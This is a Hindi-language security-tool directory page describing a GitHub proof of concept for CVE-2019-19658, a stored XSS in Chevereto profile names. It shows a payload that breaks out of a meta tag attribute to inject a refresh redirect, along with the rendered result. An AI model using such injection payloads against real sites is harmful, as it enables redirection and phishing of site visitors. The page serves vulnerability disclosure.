Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/jra89/cve-2019-19658
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjra89/cve-2019-19658

CVE-2019-19658

Chevereto प्रोफ़ाइल पृष्ठ में संग्रहीत XSS - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

रिपॉजिटरी देखें
116 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-19658

Chevereto प्रोफ़ाइल पृष्ठ में stored XSS - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core. एक सामान्य उपयोगकर्ता अपने प्रोफ़ाइल नाम में HTML और स्क्रिप्ट इनपुट कर सकता है और यह उनके प्रोफ़ाइल पृष्ठ पर निष्पादित हो जाएगा।

root@kitploit:~
/settings/profile

नाम:

root@kitploit:~
0;https://www.google.se" http-equiv="refresh" data="

प्रोफ़ाइल पृष्ठ पर परिणाम, जो Google पर रीडायरेक्ट करेगा:

root@kitploit:~
<meta name="twitter:title" content="0;https://www.google.com" http-equiv="refresh" data=" (admin)">



पंजीकृत उपयोगकर्ता नाम फ़ील्ड में कुछ स्क्रिप्ट इंजेक्ट करता है, इस मामले में उपयोगकर्ता को Google पर रीडायरेक्ट करने के लिए



कोई व्यक्ति /test की प्रोफ़ाइल में प्रवेश करता है और फिर रीडायरेक्ट हो जाता है

टूल डाउनलोड करें